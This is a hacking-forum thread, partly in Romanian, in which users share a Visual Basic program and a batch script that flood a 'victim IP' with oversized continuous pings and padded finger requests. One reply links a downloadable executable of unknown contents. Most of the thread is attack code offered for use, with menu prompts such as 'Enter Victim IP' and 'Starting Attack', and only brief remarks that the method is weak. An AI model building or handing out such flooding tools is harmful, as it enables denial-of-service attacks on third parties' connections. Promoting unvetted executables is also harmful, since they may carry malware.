Jump to content
Sub_Zero

Making A DoS Attack Program In Visual Basic

Recommended Posts

Ok start off by making a new exe and stick on there 2 command buttons, text box a label and watever really - they are the neccessary ones, u dont need the label if u dont want it.

Ok name the command buttons cmdFinger and cmdPing, the text field to txtIP and the label to lblStatus and give them suitable captions.

now for the coding.

Private Sub cmdPing_Click() 'this tells it what to give the instructions to

MsgBox "Launching Attack", vbInformation, "Launching Attack" 'This is a little pop-up

Shell ("ping " & txtIP.Text & " -l 65500 -t") ' "shell tells it to open DOS then type this in automatically

lblstatus.Caption = "Pinging IP" 'Changes the Label caption

End Sub

Private Sub cmdFinger_Click()

MsgBox "Launching Attack", vbInformation, "Launching attack"

Shell ("finger @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@" & txtIP.Text)

lblstatus.Caption = "Finger IP"

End Sub

And thats about it, compile it and ur done.

Link to comment
Share on other sites

lol...

pai dak e vorba ef eficacitate, nush ce sa mai zic ...tre sa ai net blana si victima sa fie pe dialup :D

F|_|ck1(finger) face: ping ip -l 65500 -t

F|_|ck2(ping) face: finger @@@@@@@@@@@@@@@@@@@... IP

in fine...

uite aci tot asta dar pentru consola :D

@echo off
color a
title DDos Attack - RST
:mnu
@echo DDos Attack - RST
@echo -----------------
@echo.
@echo 1= Finger Attack
@echo 2= Ping Attack
@echo 3= Quit!
@echo.
set /p c=Choose Attack Level:
if "%C%"=="1" goto finga
if "%C%"=="2" goto pinga
if "%C%"=="3" exit

:pinga
cls
set /p ip=Enter Victim IP:
@echo to stop attack press Ctrl+C
@echo Starting Attack...
ping %ip% -l 65500 -t
goto mnu

:finga
cls
set /p ip=Enter Victim IP:
@echo Starting Attack...
finger @@@@@@@@@@@@..puneti voi mai multi, urmati de %ip%
goto mnu

Scriprul de mai sus. pus intr-un exe!

Download: http://share.urbanfriends.us/uploads/a7fd97e8db.rar

Link to comment
Share on other sites

virusz wrote: lol...

pai dak e vorba ef eficacitate, nush ce sa mai zic ...tre sa ai net blana si victima sa fie pe dialup :D

...ce direct ejti...io am ziso mai elegant :D ...

...oricum indiferent de metoda nu se merita...trebuie sa ai motive foarte intemeiate sa te apuci sa il kilaresti pe unul...sau sa iti placa,asta ii altceva.

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...